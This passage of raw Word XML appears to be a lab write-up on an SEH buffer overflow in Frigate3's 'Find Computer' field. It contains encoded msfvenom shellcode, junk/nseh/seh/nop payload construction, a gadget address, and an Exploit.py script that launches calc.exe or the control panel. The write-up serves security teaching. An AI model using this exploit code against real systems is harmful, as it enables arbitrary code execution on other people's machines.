        <w:t>f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5CC008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</w:p>
    <w:p w14:paraId="443FAFE6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= b""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BDED9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b"x89xe2xdbxcdxd9x72xf4x5fx57x59x49x49x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB111EF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b"x49x49x49x49x49x49x49x43x43x43x43x43x43"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309D544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b"x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B476A91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b"x41x51x32x41x42x32x42x42x30x42x42x41x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD026DA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b"x58x50x38x41x42x75x4ax49x79x6cx59x78x4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F3B82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b"x52x75x50x75x50x47x70x51x70x4bx39x58x65"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374ABA8D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b"x55x61x6bx70x50x64x6cx4bx30x50x74x70x6e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E38246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b"x6bx66x32x36x6cx6ex6bx31x42x45x44x6ex6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09831B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b"x54x32x51x38x34x4fx6dx67x42x6ax34x66x44"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F78E2F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b"x71x39x6fx4ex4cx35x6cx70x61x63x4cx77x72"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32165FB7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b"x66x4cx77x50x7ax61x5ax6fx44x4dx56x61x79"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62C3A1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b"x57x58x62x6ax52x53x62x71x47x6cx4bx53x62"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7AA4B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b"x44x50x4cx4bx63x7ax57x4cx4ex66x30x4cx72"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CB890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b"x31x73x48x59x73x71x58x55x51x5ax71x46x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C516ACA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b"x4ex6bx76x39x45x70x75x51x39x43x6ex6bx67"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AB89A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b"x39x75x48x5ax43x57x4ax43x79x4cx4bx37x44"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108B11B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b"x4cx4bx35x51x48x56x55x61x4bx4fx4ex4cx5a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F2562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b"x61x6ax6fx46x6dx75x51x4bx77x67x48x49x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA12DE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b"x44x35x38x76x55x53x33x4dx6ax58x57x4bx31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3842A890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b"x6dx76x44x54x35x7ax44x70x58x6ex6bx33x68"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704974F3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b"x76x44x77x71x39x43x63x56x4cx4bx76x6cx70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1889E9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lastRenderedPageBreak/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b"x4bx4ex6bx33x68x57x6cx36x61x79x43x4ex6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416F7E65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b"x64x44x6cx4bx76x61x5ax70x6fx79x50x44x61"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D50BEDB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b"x34x44x64x63x6bx51x4bx51x71x63x69x71x4a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6D36A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b"x46x31x49x6fx79x70x53x6fx31x4fx51x4ax4c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D96D16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b"x4bx34x52x6ax4bx4ex6dx71x4dx63x5ax73x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253ACE32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b"x6ex6dx4fx75x6fx42x73x30x37x70x65x50x46"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05088A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b"x30x62x48x54x71x6cx4bx62x4fx4cx47x4bx4f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48256EB3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b"x4bx65x6fx4bx4ax50x4ex55x4fx52x30x56x52"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F149753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b"x48x4fx56x5ax35x6dx6dx6fx6dx39x6fx6bx65"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE443D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b"x65x6cx35x56x71x6cx76x6ax6dx50x6bx4bx4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8CA004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b"x50x72x55x66x65x6dx6bx43x77x52x33x53x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E39AB5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b"x30x6fx73x5ax43x30x46x33x4bx4fx58x55x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3091E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C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>buf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+= b"x73x72x4dx43x54x53x30x41x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E718504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</w:p>
    <w:p w14:paraId="34089803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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">payload = junk + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nseh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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>seh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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>buf.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>("utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BC6F59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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>with open ('payload.txt', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>',encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>="utf8", errors='ignore') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00089562" w14:textId="77777777" w:rsidR="007C675E" w:rsidRP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r w:rsidRPr="007C675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7C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E68FE0" w14:textId="6457813A" w:rsid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r w:rsidRPr="007C675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7C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14AF17FA" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="1C378034" w14:textId="1FD530FC" w:rsidR="007C675E" w:rsidRDefault="007C675E" w:rsidP="007C675E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Payload generated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E0F14" w14:textId="564054C7" w:rsid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r w:rsidRPr="007C675E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7D0131ED" wp14:editId="6C2177BB">
            <wp:extent cx="6119921" cy="1190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1790" cy="11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2928" w14:textId="27F0FF80" w:rsidR="007C675E" w:rsidRDefault="007C675E" w:rsidP="007C675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Somewhat like this </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE6B23" w14:textId="77777777" w:rsidR="007C675E" w:rsidRPr="00BD1F17" w:rsidRDefault="007C675E" w:rsidP="007C675E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D2A4B9" w14:textId="6D0620D3" w:rsidR="00BD1F17" w:rsidRDefault="00BD1F17" w:rsidP="007C675E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD1F17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Crashing the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA94535" w14:textId="77777777" w:rsidR="002462DA" w:rsidRDefault="002462DA" w:rsidP="007C675E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED0E2D6" w14:textId="3CD07A52" w:rsidR="002462DA" w:rsidRDefault="002462DA" w:rsidP="007C675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Use the generated payload and try to exploit any of the input fields to see if crashes or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF84DE0" w14:textId="77777777" w:rsidR="002462DA" w:rsidRDefault="002462DA" w:rsidP="007C675E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F15D81" w14:textId="24458BC8" w:rsidR="002462DA" w:rsidRDefault="002462DA" w:rsidP="007C675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Here the FIND COMPUTER field has a buffer overflow vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02EE76" w14:textId="06831E64" w:rsidR="002462DA" w:rsidRDefault="002462DA" w:rsidP="007C675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It crashed the application and triggered calc.exe which opens the calculator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A4A03" w14:textId="0D8DB733" w:rsidR="004B7776" w:rsidRDefault="002462DA" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F5839">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10B9EA02" wp14:editId="77713FCB">
            <wp:extent cx="5731510" cy="46951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E0B3" w14:textId="77777777" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1A753D" w14:textId="3F79508B" w:rsidR="004B7776" w:rsidRDefault="00C86873" w:rsidP="00130FC5">
      <w:r w:rsidRPr="00C86873">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C13C934" wp14:editId="1ECA4977">
            <wp:extent cx="3813772" cy="312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0774" cy="312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53C3" w14:textId="77777777" w:rsidR="00704C1D" w:rsidRDefault="00704C1D" w:rsidP="00130FC5"/>
    <w:p w14:paraId="7B966174" w14:textId="77777777" w:rsidR="00704C1D" w:rsidRDefault="00704C1D" w:rsidP="00130FC5"/>
    <w:p w14:paraId="64C66BA5" w14:textId="2B1C7481" w:rsidR="00704C1D" w:rsidRDefault="00704C1D" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Task 2 (TRIGGERING CONTROL PANEL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA2D44" w14:textId="77777777" w:rsidR="00610F45" w:rsidRDefault="00610F45" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18076C3D" w14:textId="1BBC4F54" w:rsidR="00610F45" w:rsidRDefault="00610F45" w:rsidP="00130FC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Generate payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FD00E2A" w14:textId="47A4E8DA" w:rsidR="00610F45" w:rsidRDefault="00610F45" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00610F45">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C85D906" wp14:editId="4459C27E">
            <wp:extent cx="4362450" cy="357367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4087" cy="357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024D" w14:textId="77777777" w:rsidR="001C0DB8" w:rsidRDefault="001C0DB8" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F6FA5F" w14:textId="23BB20C2" w:rsidR="001C0DB8" w:rsidRDefault="001C0DB8" w:rsidP="00130FC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Use this is in the code </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F5D71C" w14:textId="393A9619" w:rsidR="007B1918" w:rsidRDefault="007B1918" w:rsidP="00130FC5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Code-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A2356" w14:textId="594BD5A6" w:rsidR="007B1918" w:rsidRDefault="007B1918" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F925D52" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t># -*- coding: cp1252 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D130788" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E149FBC" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">f= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"paylctrl.txt", "w")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6840B308" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15211B8A" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>junk="A" * 4112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A4A9C" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7D1578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nseh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\x20\x90\x90"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD6B6C" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFEC502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seh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="\x4B\x0C\x01\x40"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD8AF1A" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C235F7" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#40010C4B   5B               POP EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CFD14" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#40010C4C   5D               POP EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A5B286" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#40010C4D   C3               RETN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE7261" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">#POP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EBX ,POP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> EBP, RETN | [rtl60.bpl]  (C:\Program Files\Frigate3\rtl60.bpl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36D9D1" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4EF3F3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nops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="\x90" * 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1A6FE" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA01F89" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a x86 --platform windows -p windows/exec CMD=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>alpha_mixed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -b "\x00\x14\x09\x0a\x0d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E6ACA1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</w:t>
